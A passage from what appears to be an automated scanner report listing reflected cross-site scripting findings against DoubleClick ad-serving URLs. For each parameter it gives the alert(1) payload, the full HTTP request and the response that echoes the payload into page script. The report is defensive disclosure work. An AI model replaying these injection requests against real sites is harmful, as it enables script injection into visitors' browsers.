2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fdhttp://content.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html?offer=ssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscript
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff78a"-alert(1)-"3582cf30a1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = u
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69442"-alert(1)-"07e6bcbb79d was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c2d"-alert(1)-"a12e235cd32 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
YXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
v
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eedea"-alert(1)-"b4205954787 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 578f1"-alert(1)-"9cb53d4b6d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7527

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1db/%2a/j%3B235044966%3B1-0%3B0%3B58876509%3B3454-728/90%3B40290298/40308085/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1s
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f57'-alert(1)-'ca7e6a01360 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:04 GMT
Expires: Thu, 03 Feb 2011 16:06:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360https://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494\">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48315"-alert(1)-"6e66920d7bf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:59 GMT
Expires: Thu, 03 Feb 2011 16:05:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bfhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9569'-alert(1)-'6b525c8dbf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600\">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417c6"-alert(1)-"e33aa584cf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494");
var fscUrl = url;
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
